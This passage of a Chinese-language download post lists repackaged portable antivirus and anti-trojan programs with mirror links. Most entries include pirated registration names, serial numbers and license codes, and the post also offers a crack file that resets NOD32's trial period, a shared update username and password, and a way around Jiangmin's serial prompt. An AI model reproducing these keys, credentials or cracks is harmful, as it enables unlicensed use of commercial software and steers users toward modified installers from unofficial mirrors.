/>备选地址:http://www5.fixdown.com/doskill/zhuansha/1.rar <br /><br />2.Ad-Aware SE Professional 1.06绿色全插件版(解压就能用，可升级) 病毒库0608 <br />http://down.safechina.net/zhuansha/2.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/2.rar <br /><br />3.木马克星 5.51 build 0624 绿色版(解压就能用)，可使用里面木马克星升级器1.74.1 在线升级 病毒库 0615 病毒库0514 <br />注册名：M3N536S67QJEDE5J67FS <br />注册码：1927344515 <br />注意：这些注册码可以在线升级病毒库 <br />每天更新的离线升级包下载地址: http://rav.xxjp.org <br />Iparmor Updater V1.74.1文件夹里面升级补丁!! <br />IparmorDeAds 文件夹里面去广告程序!! <br />http://down.safechina.net/zhuansha/3.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/3.rar <br /><br />4.木马防线2005 绿色版 (解压就能用，可直接在线升级) 病毒库0614 <br />软件介绍： <br />木马防线2005是安天公司推出的一款面向个人用户的专业级反木马信息安全产品，也是国内首款通过公安部权威检测的同类软件。该软件的前身是Antiy Ghostbusters，被网友称为“捉鬼队”，在美国及欧洲各国已经为用户提供服务4年，并在全球木马查杀、反间谍工具排行中遥遥领先，获得多次海内外专业媒体盛誉，当年就成为全球AntiVirus TOP 50中唯一的上榜中国产品 <br />木马防线 2005 官方注册 <br />正版序列号： HS5WFV-UN2CV1-9U5CLT-NF6423 <br />把离线升级包解压到木马防线AGB4文件夹里面 <br />使用离线升级包[光盘版] <br />http://dl.antiy.com/update/agb4/agb4cd.rar <br />木马防线2005　安天实验室 <br />http://www.antiy.com/product/ghostbusters/index.htm <br />《计算机应用文摘专用版》序列号： X6E4QW-FBXR84-U9YRHL-D4DFHG <br />http://down.safechina.net/zhuansha/4.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/4.rar <br /><br />5.木马分析专家2006 V7.32 绿色版 病毒库0615 <br />软件介绍： <br />木马分析专家能自动分析、终止可疑进程、窗体类型及木马详细资料(如创建时间,文件大小,分析 Config.sys、Autoexec.bat、Winstart.bat、System.ini、Win.ini、注册表Load键值等),并能随时在线升级木马病毒代码特征库,100%查杀各种未知木马。另外，木马分析专家个人防火墙为您的计算机提供全面的保护，有效地监控任何网络连接。通过过滤不安全的服务，防火墙可以极大地提高网络安全，同时减小主机被攻击的风险。使系统具有抵抗外来非法入侵的能力，防止您的计算机和数据遭到破坏。另外，木马分析专家+窗体属性修改专家+防火墙+在线杀毒等是一个套餐综合软件。注册后，即可使用全部软件！ <br />2005最新功能有：新增显示与进程及窗体相关的所有详细信息：包括进程ID、优先级、包含的线程数、包含的模块数、进程文件大小、创建时间、访问时间、修改时间、文件的版本信息等。新增(IE/木马)个人防火墙,在线杀毒。最新版加强了对第五代木马的分析与查杀,能完美的查杀各种无进程,捆绑木马。木马分析专家不仅是查杀木马工具,更是一个安全分析审核工具,它提供了十余种安全审核功能,将许多安全审核工作集成于一身,可以帮助您迅速判断本机的安全状况,大大方便您的工作。防火墙新增对第2代反弹型木马的监控。 <br />最好断开网络后注册，成功的几率更大一些！6.88版注册算法已改变，请替换以前版本通过注册！ <br />用户名：hywtv34s <br />注册码：hywtv34s <br />http://down.safechina.net/zhuansha/5.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/5.rar <br /><br />6. Trojan Remover(木马清除器) v6.49 绿色版 病毒库0614 <br />软件介绍： <br />这是一个专为来清除特洛伊木马和自动修复系统文件的工具软件。它能够检查系统中的登录文件、扫描WIN.INI、SYSTEM.INI和系统登录文件，且扫描完成後会产生Log资讯文件，并帮你自动清除特洛伊木马和修复系统文件。 <br />http://down.safechina.net/zhuansha/6.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/6.rar <br /><br />7. Spy Emergency 2005 C. 2.0.320 汉化绿色版 病毒库0610 <br />软件介绍： <br />一款来自斯洛伐克的反间谍产品，专注于查杀间谍软件、木马、键盘记录机等。顾名思义是『反间谍应急中心』，界面极酷，以火红的默认主题彰显其强力的查杀能力。数据库有十余兆之大，目前已收集了近十万个特征码，相对较全。独创多轮检测技术，并提供常规的实时防护等。软件操作极其简便，直观而清爽，注重用户体验，绝对推荐！ <br />Name:kickspyaway <br />Email:kickspyaway@kickspyaway.org <br />Code:8D8F721-5FDF9C4-405754D-BA76132B <br />号称无坚不摧的杀软哦。 <br />http://down.safechina.net/zhuansha/7.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/7.rar <br /><br />8. VK2005反木马专家 v3.1 绿色版『700K 查杀准确的木马防护软件』 病毒库0429 <br />软件介绍： <br />是一款同时拥有反木马、反间谍和反病毒功能的强大电脑防护软件。下载后请立即更新到最新版本。 <br />http://down.safechina.net/zhuansha/8.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/8.rar <br /><br />9. TVK 诺伊托维斯特安全防线 2006 绿色版 病毒库0614 <br />软件介绍： <br />Look 'Trojan' Stop - 诺伊托维斯特 TVK 安全防线 2005 是一款功能强大，并同时拥有反木马、反间谍和反病毒功能的木马病毒查杀工具。它采用全智能化的木马病毒查杀方式，从木马病毒的查杀，到电脑系统的修复，它让您轻松完成；独创的木马病毒分析检测技术让它拥有非凡的扫描速度。独创的实时监控功能可以实时监控在您的电脑上进行的每一个操作，并且让系统资源占用降低到最小。自动更新功能加每日病毒库升级让您的电脑系统永远免受最新木马病毒的入侵。独一无二的插件支持技术，让您可以根据自己的需要开发属于自己的木马病毒查杀软件。 <br />主要功能： <br />全面查杀木马、游戏盗号、密码窃取、间谍程序、黑客程序、病毒、蠕虫等各种恶意程序。 <br />全智能化的木马病毒查杀方式，从木马病毒的查杀，到电脑系统的修复，它让您轻松完成。 <br />独创的木马病毒分析检测技术让它拥有非凡的扫描速度。 <br />独创的实时监控功能可以实时监控在您的电脑上进行的每一个操作。 <br />自动更新功能加每日至少一次的病毒库升级让您的电脑系统永远免受最新木马病毒的入侵。 <br />全新的恶意网站免疫功能。 <br />独一无二的插件支持技术，让您可以根据自己的需要开发属于自己的木马病毒查杀软件。 <br />专业实用的管理工具 <br />简洁易用的操作界面 <br />超级低量的电脑资源占用率 <br />http://down.safechina.net/zhuansha/9.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/9.rar <br /><br />10. 木马杀客 5.2 绿色版 病毒库0615 <br />软件介绍： <br />经过漫长的测试及完善,木马杀客5.2面世了,新版分别设了电信,网通升级服务器.彻底解决了升级难的问题,解决了对各系统的兼容问题,全盘扫描让你更轻松完成扫描,点内存更小更稳定.增加右键扫描.由于近期灰鸽子木马的横行,故新版附带灰鸽子专杀工具完全查杀所有灰鸽子木马.更加强了对种类变种木马查杀力度.让木马无处遁形.采用剑马新图标,更美观.软件更加易用功能更加贴心,让你在上网冲浪的同时免去了对木马防范的顾虑,让你的机子不再受到木马的威胁.. <br />5.2将本着继续免费的原则让广大用户更加放心的使用.! <br />太阳天天升起，杀客时时关怀 <br />安装有5.1版本或测试版本的请先完全卸载或删除版本再安装5.2新版本 <br />附带的灰鸽子专杀 可查杀所有灰鸽子木马 已经过严格测试 <br />http://down.safechina.net/zhuansha/10.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/10.rar <br /><br />11. 木马专家 2006 绿色版 病毒库0615 <br />软件介绍： <br />木马专家2005是一款防杀木马软件，软件除了采用传统病毒库查杀木马以外，还能查杀未知木马，自动监控内存非法程序，实时查杀内存和硬盘木马。第二代查杀内核，查杀木马更快速。软件本身还集成了IE修复，系统文件修复，Host表修复，硬盘扫描功能和供高级用户使用的系统进程管理和启动项目管理等。功能强大的系统实时防护，随时保护您的系统免受木马侵害，硬盘扫描功能让木马无法隐藏在你的系统任何角落，相关系统管理帮助你更好的管理系统启动项目。 <br />软件内所使用木马查杀,病毒特征码,智能识别等技术是Beyond工作室原创 <br />http://down.safechina.net/zhuansha/11.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/11.rar <br /><br />12. 反黑精英(Trojan Ender)V3.61 绿色版 病毒库0409 <br />软件介绍： <br />反黑精英[Trojan Ender] 广受好评！木马、QQ盗号软件、传奇盗号软件等各种黑客程序的真正克星！查杀速度最快，准确率最高，杀除最细致!各种辅助工具使用简单而功能强大!查杀速度又获大幅提升！新增分析扫描功能，可查未知木马！木马、QQ盗号软件、传奇盗号软件等各种黑客程序一杀无遗！查杀全面准确，速度超快，使用简单方便，运行稳定，界面美观！可自动修复被破坏的注册表键值！支持对压缩文件的扫描，并可轻松查杀捆绑式木马、无进程木马！系统优化器提高您的系统运行效率！IE修复器轻松修复恶意网页的破坏！ <br />http://down.safechina.net/zhuansha/12.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/12.rar <br /><br />13. 费尔托斯特安全 2005 R2 电脑报读者专用绿色版 病毒库0610 <br />软件介绍： <br />费尔托斯特安全(Twister Anti-TrojanVirus)是一款同时拥有反木马、反间谍和反病毒功能的强大电脑防护软件。支持Windows安全中心，支持右键扫描，支持对ZIP、RAR等主流压缩格式的全面多层级扫描，实时监控功能可以对硬盘、软盘、光盘、移动硬盘、网络驱动器、网站浏览、E-mail附件中的每一个文件活动进行实时监控，并且系统资源占用极小。采用SmartScan快速扫描技术，具有非凡的扫描速度。国际一流的网页病毒分析技术，拥有最出色的恶意网站识别能力。它的行为性智能分析和Windows信任验证技术可以准确辨别出隐藏在电脑中的其他未知木马和恶意程序，同时避免同类防木马软件中存在的严重“谎报”现象。它的“系统快速修复工具”可以对IE、Windows、注册表等常见故障进行一键修复。 “木马强力清除助手”可以轻松清除那些用普通防毒软件难以清除掉的顽固性木马和间谍程序。注册表实时监控能够高效阻止和修复木马病毒对注册表的恶意破坏。支持病毒库在线升级和自动升级，不断提升对新木马新病毒的反应能力。 <br />注册码: 31AC-92BD-AD43-0C8E-1499 <br />注册码有效期: 1年，2006年1月1日——2006年12月31日(包含)，从2007年1月1日起失效 <br />病毒库授权使用期限: 自第一次成功注册时间开始至2006年12月31日(包含)终止 <br />软件授权使用期限: 自第一次成功注册时间开始至2006年12月31日(包含)终止 <br />http://down.safechina.net/zhuansha/13.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/13.rar <br /><br />14. 木马清道夫v6.61 电脑报合订专业绿色版 病毒库0615 <br />软件介绍： <br />《Windows木马清道夫》是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品，是全新一代的木马克星！《Windows木马清道夫》可自动查杀上万种木马，配合手动分析可近100%对未知木马进行查杀！它不仅可以查木马，还可以分析出后门程序，黑客程序等等。它专业的分析功能，完美的升级功能，使您不再惧怕木马，让您远离木马的困扰！还不快把这位安全防卫专家请进您的电脑，您还在犹豫什么？ <br />为什么要选择《Windows木马清道夫》？ <br />(1)自动查杀上万种木马病毒，流行病毒及间谍程序等等 <br />(2)有效的未知木马探测功能 <br />(3)嵌入式行为分析，对每一个可疑程序的启动进行有效的拦截 <br />(4)高速准确的硬盘扫描引擎，更快更稳定，将误杀降到最低！ <br />(5)专业的辅助查杀功能，让您迅速了解本机的安全状况 <br />(6)强大的漏洞检测功能，增强您系统的抵抗力 <br />(7)人性化的操作界面，更容易上手！ <br />(8)内置高性能木马防火墙，真正实时保护系统及网络的安全 <br />(9)提供插件扩展，更方便地扩展软件的各种功能 <br />(10)完善的木马上报系统,及时地做出响应 <br />(11)木马病毒库每天更新，让软件始终保持抵御最新木马病毒的状态 <br />电脑报专业可以免费升级三个月。～ <br />http://down.safechina.net/zhuansha/14.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/14.rar <br /><br />15.Spybot Search Destroy 1.4 final绿色版(解压就能用，可升级) 病毒库 0610 <br />软件介绍： <br />顾名思义Spybot Search and Destroy是专门用来清理spyware的工具。到目前为止，他已经可以检测一万多种spyware，并对其中的一千多种进行免疫处理。可以说是杀毒软件的一个强有力的补充。而且这个软件是完全免费的。可以在Server级别的操作系统上使用。强烈推荐给各位！ <br />http://down.safechina.net/zhuansha/15.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/15.rar <br /><br />16.木马橡皮擦百达特 1.03 绿色版 <br />软件介绍： <br />木马橡皮擦百达特（vidr）能防止和删除windows系统里面的特洛伊木马、间谍软件、恶意广告以及其他具潜在危险性的软件。百达特木马橡皮擦给您提供全方位的保护。 <br />上网冲浪时，通常遇到令人厌烦的弹出性广告，对网络进行不必要的设置，甚至窃取用户的私人信息，拖满系统性能等，而百达特软件可以大大减少这些负面影响，达到用户网上冲浪更为安全. <br />主要功能：１。防杀木马、间谍软件、恶性代码 <br />　　　　　２．免费主动升级 <br />　　　　　３．容量小，查杀病毒速度快 <br />　　　　　４．个人隐私保护 <br />　　　　　５．可以反馈您的病毒意见 <br />http://down.safechina.net/zhuansha/16.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/16.rar <br /><br />17.Ashampoo AntiSpyWare 1.30 绿色优化版(Ewido加强版 全面保护计算机) 病毒库0614 <br />软件介绍： <br />一款全面呵护你个人计算机免受恶意入侵的安全工具。 <br />汲取了ewido的精华，采用汲取了ewido最最精华的东西（20多万的ewido特征库和扫描速度优秀的ewido扫描引擎）添加自己的独创（文件删除器, rootkit侦测工具，网络痕迹清除），被称为ewido的豪华版本在经过几分瘦身（占用系统资源比ewido少）, 与反木马间谍软件两大巨头 webroot spysweeper 和 counterspy 有形成三足鼎立之趋势。 <br />主要特性 <br />1.全面防护：使你远离 劫持软件、远程拨号、间谍软件、蠕虫、广告、特洛依木马、键盘记录，甚至于内核层的有害软件--rootkits； <br />2.一次设置，永久使用：使用简单，启用AnitSpyware Guard，并开启自动更新，你将受到持续的良好防护，自动清除、实时监控整个系统； <br />3.特征码每日升级：每天升级的威胁特征码确保最大的安全； <br />4.防止未知威胁：高级的启发式分析基于行为识别和阻止未知威胁； <br />5.隔离区：将可疑文件放入隔离区，起到保护作用的同时防止将无害的文件删除； <br />6.多语言界面：可以使用本地化语言运行； <br />7.Rootkit检测：能识别新的、高危的rootkit，即使他们被病毒扫描放过； <br />8.管理自动启动：识别和禁止不需要的自动启动程序； <br />9.系统进程监控：检测运行进程，必要时停止这些进程； <br />10.Internet清除：删除所有的上网冲浪的痕迹； <br />11.文件擦除：永久删除目录和文件，使其不可恢复； <br />13.基于IP的LJ邮件阻挡：阻止恼人的弹出式LJ邮件。 <br />突出技术 <br />1.启发式分析：基于行为识别威胁的高级算法； <br />2.内存扫描：检测和阻止活跃威胁； <br />3.内核层防护：确保全面、无缝的监控； <br />4.系统全面扫描：扫描和清楚系统注册表、文件和系统区域；  <br />5.补丁校验：高安全的签名防止恶意的补丁； <br />6.压缩文档扫描：扫描压缩文档中的每个文件； <br />7.DLL 木马：安全的检测和删除DLL 木马； <br />8.加密和加壳：识别使用加密和加壳隐藏的恶意程序。 <br />启动Ashampoo AntiSpyWare 输入注册码即可！ <br />注册码： <br />AASWA0-7700BA-0D39B4 <br />AASWA0-100031-96C6D8 <br />如果注册码失效，大家可到ewido下载病毒库更新！ <br />http://www.ewido.net/en/download/updates/ <br />http://down.safechina.net/zhuansha/17.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/17.rar <br /><br />18.Pclxav(木马猎手) (含注册码) 病毒库 0615 <br />本软件集静态特征字扫描与广谱多元扫描法于一身，是互联网时代反击木马的好工具。主要特性如下：1静态特征字扫描法查公开的已知木马2广谱特征扫描法查脱壳后运行的变种木马。此法保证查杀绝大多数版本冰河，TRACEBOY等的脱壳运行木马。3可自由扫描文件，集中于系统EXE，DLL文件菜单中，扫描文件夹，内存。（使用了广谱扫描，所以速度稍慢，引擎将在未来智能提速)4.升级方便，每隔几天发布最新木马库文件，直接覆盖或解压到原目录即可，在引擎不变无需频繁更新。5软件具有自校验机制，避免了被病毒感染后让其不断扩散，软件被自动删除后请首先用查毒软件查毒实在抱歉，刚刚推出才发现软件严重错误，现在扫描速度为正常状态了。本版还可以选择是否打开扩展的广谱扫描法，打开后速度有所下降，但安全性高。｛不要动不动就扫描硬盘，这对硬盘生存不利。) <br />注册名称：zjsdddd <br />注册码：176313180 <br />http://down.safechina.net/zhuansha/18.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/18.rar <br /><br />19.木马防线 2005+ V4.6.3 智能化绿色版 病毒库0614 <br />软件简介： <br />是安天实验室出品的个人信息安全产品，具备高效木马查杀、系统安全管理、实时网络防护等功能。它采用全新的高速智能检测引擎（ＳＶＥ），能够完全查杀国内外流行的6万余种木马、后门、蠕虫、间谍软件、广告软件、黑客工具、色情拨号程序等，尤其对各类未知有害程序具有极高的检出率。 <br />输入序列号后即可免费使用“木马防线2005+” <br />木马防线 2005版序列号：X6E4QW-FBXR84-U9YRHL-D4DFHG <br />木马防线 2005+版序列号：HXAA7WF-F43CAPE-RYNCWXP-ERWA3HR <br />可以无限制免费升级 <br />安装说明： <br />解压文件到任意盘符下面。我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.cmd文件即可，如果第二次的话直接运行Agb5.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.cmd文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\Common Files\Antiy Labs\"里面的所有文件 <br />http://down.safechina.net/zhuansha/19.rar <br />备选地址:http://www5.fixdown.com/doskill/zhuansha/19.rar <br /><br />二、绿色版杀毒软件如下： <br />1. Kaspersky Anti-Virus Personal Pro 5.0.391 绿色全功能正式版 病毒库0615 <br />http://down.safechina.net/lvse/1.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/1.rar <br /><br />2.金山毒霸2006安装组合装绿色免安装版,测试过,暂时可在线升级 病毒库0615 <br />注意:只能查杀病毒,除了能开启网标监控,别的都不能开启监控程序 <br />金山毒霸2006免|通行证|程序 使用说明： <br />把里面的所有文件全部复制到金山安装目录里面，开始在线升级 <br />http://down.safechina.net/lvse/2.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/2.rar <br /><br />3.AntiVir PersonalEdition Premium绿色免安装可在线升级商业版 <br />主程序:6.32.00.07 病毒库 0615 <br />http://down.safechina.net/lvse/3.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/3.rar <br /><br />4.北信源VRV2005绿色免安装可在线升级版 病毒库 0613 版本80q <br />http://down.safechina.net/lvse/4.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/4.rar <br /><br />5.F-Prot(冰岛) Antivirus for WINDOWS v3.16f中文免安装可在线升级绿色版 病毒库0615 <br />感谢jedi1029制作了汉化补丁 <br />软件介绍: <br />消耗资源很低，实时监控灵敏，带网络文件扫描系统的冰岛产杀毒软件，已通过多个 VB100%。 功能不多却实用至上，此版本支持 WINDOWS ALL。病毒库已经有22万之多 <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行FP-Win.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />还有此版本不能开启监控，可以辅助查杀病毒用 <br />此版本在多个平台测试无问题，可在线升级 <br />http://down.safechina.net/lvse/5.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/5.rar <br /><br />6．东方卫士2005 中文免安装可在线升级版 病毒库 0615 <br />软件介绍: <br />免费升级序列号：DFVSX-B00D1309-15358525-2426 <br />　　东方卫士2005（完整功能）下载版最先支持WindowsXP推出的SP2服务包，与SP2的安全中心进行了防毒认证，是最先获得微软认证的防毒软件之一。 <br />　　能够和WindowsXP SP2安全中心状态形成互动，及时提醒防毒软件是否过期。 <br />　　东方卫士2005（完整功能）下载版不仅延续了“一防、二杀、三恢复”的防毒理念，在防毒功能和特色功能上作了深入改进，真正做到了安全、稳定、易用！ <br />目前免费使用，免费升级！ <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行DFVSX.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />还有此版本不能开启监控，可以辅助查杀病毒用 <br />此版本在多个平台测试无问题，可在线升级 <br />http://down.safechina.net/lvse/6.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/6.rar <br /><br />7.江民2006 中文绿色免安装版 病毒库 0615 <br />使用说明： <br />在安装完以后，桌面会自动生成江民的快捷方式，运行这个快捷方式，会要求提示输入 <br />序列号，不用理睬它，这样江民杀毒软件就能运行了 <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行KvXP.kxp即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />还有此版本可以开启部分监控，可以辅助查杀病毒用 <br />此版本在多个平台测试无问题，可在线升级 <br />http://down.safechina.net/lvse/7.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/7.rar <br /><br />8.瑞星2006 中文绿色免安装版 病毒库 0615 <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行rav.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />此版本在多个平台测试无问题 <br />http://down.safechina.net/lvse/8.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/8.rar <br /><br />9.NOD32 Antivirus System Administrator v2.51.12 Final 全功能中文免安装可在线升级版 病毒库 0614 <br />软件说明： <br />国外很权威的防病毒软件评测给了NOD32很高的分数。在全球共获得超过40多个奖项,包 <br />括Virus Bulletin, PC Magazine, ICSA认证, Checkmark认证等, 更加是全球唯一通过 <br />26次VB100%测试的防毒软件,高据众产品之榜首！产品线很长，从DOS，Windows 9x/Me， <br />Windows NT/XP/2000，到Novell Netware Server、Linux、BSD等，都有提供。 可以对 <br />邮件进行实时监测，占用内存资源较少，清除病毒的速度效果都令人满意。 <br />使用说明： <br />运行@install.cmd后重新启动机器即可。 <br />卸载时运行@UNinstall.cmd，重新启动机器后删除该文件夹即可。 <br />nod32fix.reg为最新破解使用时间文件，在使用前运行 <br />在英文2003下测试无问题，可在线升级。没有带升级ID，需要在升级时输入有效ID。 <br />05.14日测试通过 <br />Username: AV-3325178 <br />Password: tigbesgf7p <br />http://down.safechina.net/lvse/9.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/9.rar <br /><br />10.安博士杀毒软件V3 智能化绿色server版 病毒库0615 <br />软件简介： <br />V3 杀毒软件适应企业计算机环境，提供最佳技术和方便的操作。 <br />具有最可靠的V3 引擎可完全修复受损的文件. <br />提供每周的引擎升级服务。 <br />通过“Smart Update”功能，自动升级引擎。 <br />收到病毒举报后的24小时内进行分析，提供最新引擎及紧急升级. <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行Gfw.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"和系统目录里面的所有文件 <br />http://down.safechina.net/lvse/10.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/10.rar <br /><br />11.安博士杀毒软件2005 智能化绿色单机版 病毒库0615 <br />软件简介： <br />V3 杀毒软件适应企业计算机环境，提供最佳技术和方便的操作。 <br />具有最可靠的V3 引擎可完全修复受损的文件. <br />提供每周的引擎升级服务。 <br />通过“Smart Update”功能，自动升级引擎。 <br />收到病毒举报后的24小时内进行分析，提供最新引擎及紧急升级. <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行v3pro32.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"和系统目录里面的所有文件 <br />http://down.safechina.net/lvse/11.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/11.rar <br /><br />12.驱逐舰杀毒软件5.0a 绿色版 病毒库0615 <br />软件简介： <br />1.这是一个安装文件最小的防毒软件!仅4M <br />2.这是一个占用资源最小的实时防毒软件! <br />3.这是一个真正具有底层保护的防毒软件! <br />4.这是一个真正每天升级甚至升级7次的防毒软件! <br />5.这是一个平均每次升级只需要3K网络资源的软件! <br />6.这是一个真正智能对比本地文件而进行升级的防毒软件! <br />7.这是一个不会每年需要重新买一套新版的防毒软件! <br />8.只要有升级时间就可以升级到最新版本和升级最新病毒库! <br />9.这是一个支持内存(非进程)实时扫描的防毒软件! <br />10.它通过了Virus Bulletin 100%的认正! <br />每日自动升级，优秀的病毒扫描及修复功能，windows下的真正底层保护功能，强有力而以最小化占用系统资源的实时监视功能，强大的自身免疫功能，真正的内存修复功能，最小占用系统资源，支持多种压缩文件，多国语自动支持。 <br />使用说明: <br />解压文件到任意盘符下面，运行Vcr32.exe即可 <br />http://down.safechina.net/lvse/12.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/12.rar <br /><br />13.日月光华杀毒软件 智能化绿色版 病毒库0615 <br />软件简介： <br />光华反病毒软件拥有自主的杀毒引擎，具有强大的技术核心，提出了一套完整的“全面查杀，封死 <br />通道”的立体反病毒新概念，开发出“查、杀、防”三套核心技术。 <br />具备强大的自动病毒隔离管理系统，内置绿色上网、游戏帐号和装备保护、QQ安全保护、木马搜索 <br />注册表修复、反LJ邮件等插件，并可无限扩展。保护系统核心数据。依靠光盘启动查杀，无需应急盘。 <br />为贴用户提供详尽的查毒报告、监视报告、运行报告，便捷的管理查看操作，光华反病毒软件为用户度 <br />身定做的心服务，针对游戏玩家的虚拟财产保护，针对网上银行的个人隐私与信用认证保密功能，针对 <br />即时通讯产品的信息安全保护和软件缺陷补丁等安全功能。 <br />产品人性化设计，操作界面简洁友好，产品在文档、界面布局、操作习惯、指示标志、图文并茂的产品 <br />说明等方面全方位贴近用户。服务便捷，升级迅速，让用户在第一时间享受到最可靠的安全服务，技术 <br />让用户放心，服务让用户省心。全天候的不间断技术服务支持，随时随地的线上服务应答，快速、自动、 <br />全面的升级服务。 <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行vcw.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />http://down.safechina.net/lvse/13.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/13.rar <br /><br />14.Kaspersky Antivirus 6.0.0.299 Final 智能绿色中文版　病毒库0615 <br />软件简介: <br />当前发布的汉化是 Kaspersky 发布的 6.0 正式版本。由俄罗斯卡巴斯基实验室开发的强力杀毒软件!6.0包含了对文件系统的实时监视,Office 宏的扫描。对指定注册表键值的操作的监视。应用程序完整性检测。(防止被未知程序篡改)，Web 脚本防护等~6.0 已经将杀毒软件推向了一个前所未有的高度。目前 Kav 已经完成了对 6.0 的开发,已经转入后继版本 Mp1 的开发中安装补丁前请仔细阅读补丁给出的信息框然后再操作。压缩包内已有注册 Key ^_^ <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行avp.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"和系统目录里面的所有文件 <br />注意:如果运行此版以后出现打开目录为空的情况,请运行内置patch.exe进行修复,谢谢!! <br />目前系统2000下面经过测试运行一切正常，xp下面会出现要求重新安装程序，原因暂时不明，请xp系统用户暂时别用，我会尽开解决的！！ <br />http://down.safechina.net/lvse/14.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/14.rar <br /><br />15.Dr.Web杀毒软件4.33.2.05150 绿色单机版 病毒库0615 <br />使用说明: <br />解压文件到任意盘符下面，运行drweb32w.exe即可，内有老版本汉化补丁，可替换原文件使用 <br />升级说明: <br />Dr WU Crsky 文件夹中内含有升级器，经目前测试可升级，升级前请先看内置说明 <br />http://down.safechina.net/lvse/15.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/15.rar <br /><br />16.【原创】avast! Professional Edition V4.7.844 智能绿色简体中文可升级版　病毒库0613 <br />软件简介: <br />来自捷克的AVAST，已有17年的历史，但最近才在我们这里兴起，它在国外市场一直处于领先地位。它的家庭版是免费得，只要在它的网页上填写一下资料，但是邮箱一定要写正确，这样它才能把使用KEY发给你,这你也就可以享用它14个月了，然后再注册再使用。Avast！的实时监控功能十分强大！它拥有七大防护模块：网络防火墙防护、标准的本地文件读取防护、网页防护、即时通讯软件防护、邮件收发防护、P2P软件防护。这么完善的防护系统，定能让你的系统练就一副金刚不坏之身！任意开启各项保护模块能够查杀流氓软件,比如3721。升级很人性化Avast是捷克一家软件公司(ALWIL Software)的产品。ALWIL软件公司的研发机构在捷克的首都－布拉格，现在他们和世界上许多国家的安全软件机构都有良好的合作关系。早在80年代末ALWIL公司的安全软件已经获得良好的市场占有率，但当时仅限于捷克地区。ALMIL公司是擅长于安全软件方面的研发，开发的Avast 